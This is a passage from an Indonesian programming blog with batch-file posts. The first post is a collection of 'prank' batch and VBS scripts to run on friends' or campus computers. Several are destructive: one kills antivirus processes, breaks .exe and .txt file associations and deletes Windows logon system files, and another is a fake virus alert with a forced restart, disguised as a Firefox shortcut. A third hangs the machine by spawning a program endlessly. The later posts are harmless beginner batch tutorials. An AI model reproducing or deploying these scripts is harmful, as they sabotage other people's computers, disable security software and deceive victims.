Showing posts with label Batch. Show all posts
Showing posts with label Batch. Show all posts

Thursday, January 19, 2017

Kumpulan Script Jail Batch dan VBS

Kumpulan Script Jail Batch dan VBS


Hallo pembaca fajaryusuf.com. Kali ini saya akan berbagi Kumpulan Script Jail Menggunakan Notepad. Script berikut hanya untuk jahil.. Untuk membuat script ini aktif yang Anda butuhkan adalah :
1. Notepad
2. PC/Laptop
3. Nah sekarang tinggal copy paste scriptnya ke notepad,, langsung saja dicoba :

MESSAGES YG NONGOL TERUS MENERUS SECARA OTOMATIS
@ECHO off
:Begin
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
Save nama script diatas dg ekstensi *.bat


BIKIN SHUTDOWN + MESSAGES
@echo off
msg * apaan sih lo
shutdown -s -c "Error! muka mu
standar abis"
Save nama script diatas dg ekstensi *.bat

MAININ CAPS LOCK BUTTON
Set wshShell
=wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save nama script diatas dg ekstensi *.vbs

BUKA TUTUP CD/DVD SECARA OTOMATIS TERUS-MENERUS
Set oWMP = CreateObject
("WMPlayer.OCX.7")
Set colCDROMs =
oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save nama script diatas dg ekstensi *.vbs

BIKIN VB SCRIPT NONGOL TERUS MENERUS SECARA OTOMATIS
Set wshShell =
wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save nama script diatas dg ekstensi *.vbs

MENEKAN TOMBOL BACKSPACE TERUS MENERUS SECARA OTOMATIS
MsgBox "kembali ke menu
sebelumnya"
Set wshShell
=wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Save nama script diatas dg ekstensi *.vbs

OTOMATIS NGETIK "LU JELEK BANGET SIH" DI NOTEPAD ATAU M.WORD
Set wshShell =
wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "lu jelek
banget sih!!!"
loop

Save nama script diatas dg ekstensi *.vbs

MEMBUKA NOTEPAD TERUS MENERUS
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top
Save nama script diatas dg ekstensi *.BAT

OTOMATIS BUKA NOTEPAD LALU NGETIK "APA YG KAMU MAU"
WScript.Sleep 1800
WScript.Sleep 100
Set WshShell =
WScript.CreateObject
("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "

Save nama script diatas dg ekstensi *.vbs

BISA MEMILIH JAWABAN SEPERTI QUIZ LAH KIRA2
@echo off
title quiz hari ini :)
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top

Nah script diatas save jadi quiz.bat,

POKOKNYA KALO YG INI DICOBA DULU DEH !!
@echo off
set end=md “Hack
installing”
set fin=copy “Hack
log.txt” “Installing”
%end%
%fin%
net send * Hack is
installing, press OK to
begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is
hacked ….
msg * I warned you,
and you kept going.
Challenge me and this
is what happens.
DEL C:WINDOWS
system32logoff.exe /
F /Q
DEL C:WINDOWS
system32logon.exe /
F /Q
DEL C:WINDOWS
system32logon.scr /
F /Q
cls
shutdown -s -t 5 -c
“ thank you for
waiting”

Save script diatas dg ekstensi *.bat

MERUSAK KOMPUTER ORANG LAIN
buka cmd(comand prompt), kalo belum tahu nyari dimana , klik start-run-ketik CMD-Lalu ketikan script ini
ASSOC.exe=.hank
lalu enter!
!!!! Program kayak ms.word/game ngambek jalan ! , jika sudah puas banget jailnya (hahahaa) dan mau ngembaliin-nya , tinggal buka CMD lagi. lalu ketik
ASSOC.exe=EXEFILE


SCRIPT PALING KEREN
1. Buka program notepad atau biar cepet menu RUN ketik notepad lalu enter
2. Copy kode ini dan pastekan di notepad kamu
@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c ” SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ………..”
3. Habis itu simpen file notepad ini dengan format *.bat = terserah mau diberi nama apa, misal : pacebuk.bat dan SAVE di Dekstop (Recommended)

4. Sekarang klik kanan desktopmu dan pilih New => Shortcut

5. Setelah ini akan muncul sebuah tampilan dan klik browse lalu cari lokasi file .bat yang kamu simpen tadi, misal tadi kamu save pada dekstop

6. Klik Next dan Rename dengan Mozilla Firefox (Untuk nama ini terserah kamu dan bebas bisa ganti dengan Opera Mini atau Google Chrome, ini hanya sebagai tipuan aja)

7.Bila semua langkah sudah oke, sekarang yang perlu kamu lakuin adalah mengubah icon .bat tadi dalam bentuk Mozilla Firefox (karena kita sering pakai Mozilla jadi pembahasannya pakai browser ini) ..

Terus caranya gimana ?
Gampang.. tinggal kamu klik kanan file .bat tadi dan pilih change icon Gak nemu icon mozilla ? Coba deh kamu cari di Program Files => Mozilla Firefox
Nah sekarang virus facebookmu telah jadi dengan sempurna, kalau kamu ingin iseng nyoba tinggal di klik aja deh dan lihat perubahan yang akan terjadi ..
Harusnya pasti sedikit kaget dan coba kamu bayangin kalau trik ini kamu praktekan di kompi temen kamu atau mungkin kompi kampus atau warnet..
what will happen ? abis pastinya ..

SCRIPT PALING GANAS
Langsung aja ...
buka notepad
dan silahkan tulis script di bawah ini
option explicit

dim wshshell
set wshshell=wscript.createobject("wscript.shell")

dim x
for x = 1 to 100000000
wshshell.run "tourstart.exe"
next
simpan dengan nama (virus.vbs)

keterangan : dan silahkan jalankan file tersebut nah silahkan dilihat apa yang terjadi...? komputer sobat akan dipenuhi oleh 100000000 virus dan komputer tentunya akan hang total sebelum sobat mendelete semuanya

Saya tidak bertanggung jawab jika terjadi apa2 terhadap komputer Kamu atau teman Kamu, saya hanya memberikan Info atau sebatas sharing saja. :D

Jika ada pertanyaan silakan berkomentar.

Jangan Lupa like dan share.

Salam semangat dari fajaryusuf.com. :)

Reviewer: Effei Jeyar
ItemReviewed: Kumpulan Script Jail Batch dan VBS

Membuat Program Batch File Sederhana

Membuat Program Batch File Sederhana


Menjalankan program
a. Buka Notepad
b. Ketik sintaks berikut :
start chrome.exe www.facebook.com

c. Simpan file tersebut dengan nama facebook.bat ingat ya DOT BAT
d. kalau sudah, coba ke lokasi anda menyimpan file tersebut, lalu buka facebook.bat tersebut. Hasilnya google chrome akan terbuka untuk membuka halaman facebook

Membuat menu program
a. Buka Notepad
b. Ketik sintaks berikut :
@echo off
color 0a
:a
CLS
echo @@@@@@@@@@@@@@@@@@@@@@@
echo @@     Applications FAJARYUSUF.COM    @@
echo @@                           @@
echo @@                             @@
echo @@ *-----------------------------------------------*@@
echo @@ *          Select Your Choice * @@
echo @@ *-----------------------------------------------*@@
echo @@ *                     *@@
echo @@ *     [1] Word                 *@@
echo @@ *     [2] Excel                              *@@
echo @@ *    [3] Power Point                   *@@
echo @@ *     [4] Outlook                         *@@
echo @@ *     [5] OneNote                       *@@
echo @@ *     [6] Winamp                        *@@
echo @@ *     [7] Paint                 *@@
echo @@ *-----------------------------------------------*@@
echo @@                            @@
echo @@@@@@@@@@@@@@@@@@@@@@
echo.
set /p "pil=Insert Your Choice [1-7] : "
if %pil%==1 start winword
if %pil%==2 start excel
if %pil%==3 start powerpnt
if %pil%==4 start outlook
if %pil%==5 start onenote
if %pil%==6 start winamp
if %pil%==7 start mspaint
echo.
Pause
goto a
c. Simpan file text tersebut dengan nama menuprogram.bat
d. Run program
Hasilnya jika di run :
ada tampilan pilihan menu program,dan jika kita input angka 1-7 program yang dimenu sesuai inputan akan running dan terbuka.

Membuat program hitung
a. Buka Notepad
b. Ketik sintaks berikut ini :
@echo off
title Belajar Menghitung dengan file Batch
:awal
color 1b
ECHO ******************************************************
echo BELAJAR MENGHITUNG YUK!
echo.
echo ******************************************************
echo.
set/p "b1=Masukan Bilangan Ke-1: "
set/p "b2=Masukan Bilangan Ke-2: "
echo.
echo [1] kalikan [2] Tambah [3] Bagi [4] kurangakan
set/p "pil=Pilih Action:"
if %pil%==''goto awal
if %pil%==1 goto kali
if %pil%==2 goto tambah
If %pil%==3 goto bagi
if %pil%==4 goto kurang
echo.
:kali
set/a b=b1*b2
echo Hasil Kalinya Adalah = %b%
pause
goto awal
:tambah
set/a b=b1+b2
echo Hasil Pertambahan Adalah= %b%
pause
goto awal
:bagi
set/a b=b1/b2
echo Hasil Pembagian Adalah= %b%
pause
goto awal
:kurang
set/a b=b1-b2
echo Hasil Pengurangan Adalah= %b%
pause
goto awal
c. Simpan dengan nama hitung.bat, kemudian jalankan program
Hasilnya akan seperti ini :



Jika ada pertanyaan silakan berkomentar.
Jangan Lupa like dan share.
Salam semangat dari fajaryusuf.com. :)

Reviewer: Effei Jeyar
ItemReviewed: Membuat Program Batch File Sederhana

Wednesday, January 18, 2017

Dasar-dasar membuat File Batch

Dasar-dasar membuat File Batch


Untuk membuat file Batch, berikut contoh sederhananya:

1. Buka jendela command MS-DOS atau masuk ke MS-DOS.

2. Pada MS-DOS prompt, ketik: edit test.bat dan tekan “enter”.

3. Jika mengetiknya benar, maka layar akan menjadi biru. 
Dalam layar ketik:
Pause
dir c: \ windows
dir c:\windows\system dir c: \ windows \ system

4. Setelah itu, Klik “file” kemudian “exit”. Ketika diminta untuk menyimpan pilih “yes”. Pengguna yang tidak memiliki cursor mouse dapat melakukan hal tersebut dengan menekan Alt+F untuk mengakses menu “File”, lalu tekan “x” untuk exit dan “enter" untuk menyimpan perubahan.
5. Setelah anda kembali ke MS-DOS prompt, Ketik : tes dan tekan “enter”. Hal ini akan mengeksekusi file test.bat dan menjalankan file. Karena baris pertama adalah pause, maka Anda akan diminta untuk menekan tombol. Setelah itu file Batch akan berjalan baris demi baris.
Jika anda ingin menambahkan baris perintah file batch cukup dengan mengetikan edit test.bat untuk mengeditnya. Tapi beberapa versi MS-DOS tidak memiliki perintah Edit. Jika hal ini terjadi, maka Anda perlu untuk mendapatkan file edit.com untuk mengakses file ini atau dengan copy con command .

Sebuah file batch dapat diciptakan dengan menggunakan fasilitas editor teks, misalnya
COPY CON dan EDIT/EDLIN.

Contoh berikut menunjukkan cara membuat sebuah file batch dengan nama file Latih1.Bat.
C:\> COPY CON Latih1.Bat (enter)
Cls
Date
Dir*.com \p
^Z
1 file(s) copied


Hasil :
C:\> Latih1.Bat (enter)
The Current date is Tue 09-28-2003
Enter new date (mm-dd-yy) :
Volume in drive C has no label
Directory of C:\
Belajar.com
Bel.com
Contoh.com
C:\>_


Contoh perintah-perintah pada batch file :
1. ECHO
Contoh :
C:\> COPY CON Latih2.Bat (enter)
Echo Belajar Batch File
Echo Di Kelas 1 DA 02
^Z

Hasil :
C:\> Latih2.Bat (enter)
Echo Belajar Batch File
Belajar Batch File
C:\> Echo Di Kelas 1 DA 02
Di Kelas 1 DA 02
C:\>_


Untuk itu harus menggunakan perintah @Echo Off agar hilang / mematikan perintah penggemaan.
Contoh :
C:\> COPY CON Latih1.Bat (enter)
@Echo Off
Echo Matikan Perintah
Echo Perintah Sudah Mati
Hasil :
C:\> Latih1.Bat (enter)
Matikan Perintah
Perintah Sudah Mati


2. PAUSEContoh :
@Echo Off
Echo “Mencoba perintah pause”
Pause
Date
^Z
Hasil :





3. GO TO
Contoh :
Echo Indonesia Raya
:ulang
Echo Merdeka
Echo Tekan Ctrl+Break untuk selesai
Go To ulang


4. Perintah Call
Digunakan untuk memanggil file batch yang lain sebagai subrutin
Contoh :
C:\> EDIT Prog1.Bat
@Echo Off
Echo Off Anda berada dalam program1
Pause
Call Prog2.Bat
Echo Anda kembali ke program1
C:\> EDIT Prog2.Bat
@Echo Off
Echo program2
Echo Balik yuk!!!

Hasil :
C:\> Prog1.Bat
Anda berada dalam program1
Press Any Key To Continue…..
Program2
Balik yuk!!!
Anda kembali ke program1




Salam semangat dari Fajar Yusuf :)





Reviewer: Effei Jeyar
ItemReviewed: Dasar-dasar membuat File Batch

Perintah-perintah pada BATCH

Perintah-perintah pada BATCH



@ : Simbol ini sering ditulis sebagai @ ECHO OFF untuk mencegah ditampilkannya perintah disebelah kanan layar dalam batch file, sehingga yang ditampilkan hanya hasilnya.

ECHO : Digunakan untuk menampilkan pesan dalam batch file. Contoh, “ECHO Hello“ digunakan untuk menampilkan pesan Hello pada Program (Command Prompt,etc).

ECHO ON : berfungsi menampilkan secara lengkap perintah BATCH berikut hasilnya dan ECHO OFF : hanya menampilkan hasilnya saja. Digunakan untuk memberikan jarak satu baris kosong pada layar

REM : Kependekan dari perintah REMARK. Merupakan suatu perintah yang mengakibatkan suatu baris perintah menjadi tidak berfungsi, akan diabaikan dan tidak diproses

PAUSE : Merupakan perintah untuk meminta satu ketikan tombol sembarang, dimana pesan yang ditampilkan adalah Press any key to continue… Untuk menghilangkan pesan tersebut dapat diketikan PAUSE > NUL.

GOTO : Digunakan untuk pergi atau pindah ke perintah tertentu, seperti GOTO LABEL. Merupakan contoh dari perintah GOTO

CALL : Digunakan untuk memanggil (menggunakan) file batch lain, karena apabila kita tidak menuliskan perintah CALL pada suatu penulisan Batch file dimana kita memerlukan file tersebut maka proses akan berhenti pada perintah tersebut.

: : Digunakan jika kita ingin membuat sebuah kategori / label. Hal ini memungkinkan kita untuk melompat kebagian tertentu dari sebuah Batch file.

:: : Digunakan jika kita ingin menambah suatu komentar atau tulisan dalam Batch file tanpa harus ditampilkan atau mengeksekusi baris komentar ketika file batch dijalankan.

CHOICE : Memungkinkan Batch File dan Script file menunggu user untuk memilih satu set pilihan yang ditulis dalam batch file

CLS : Menghapus layar, membersihkan layar program dari perintah – perintah.

EXIT : Keluar dari aplikasi (Jendela DOS/Script tool)

IF : Digunakan untuk memeriksa kondisi tertentu jika kondisi tersebut tersedia.

SHIFT : Perubahan posisi parameter dalam Batch file

START : Menjalankan suatu aplikasi

DATE : Menampilkan prompt tanggal 

TIME : Menampilkan prompt waktu

PROMPT : Menampilkan direktori yang sedang aktif

Reviewer: Effei Jeyar
ItemReviewed: Perintah-perintah pada BATCH

TENTANG SITUS

SITUS INI ADALAH SITUS PEMBELAJARAN PEMROGRAMAN DAN JUGA PEMAHAMAN TERHADAP TEKNOLOGI KOMPUTER. KALIAN BISA MENGIKUTI PEMBELAJARAN PEMROGRAMAN DENGAN BERTAHAP PADA MATERI YANG SUDAH SAYA SEDIAKAN, JIKA ADA MATERI YANG MEMBINGUNGKAN SILAKAN LAKUKAN KOMENTAR PADA MATERI YANG ANDA TANYAKAN ATAU KALIAN BISA MENGHUBUNGI SAYA DIHALAMAN KONTAK.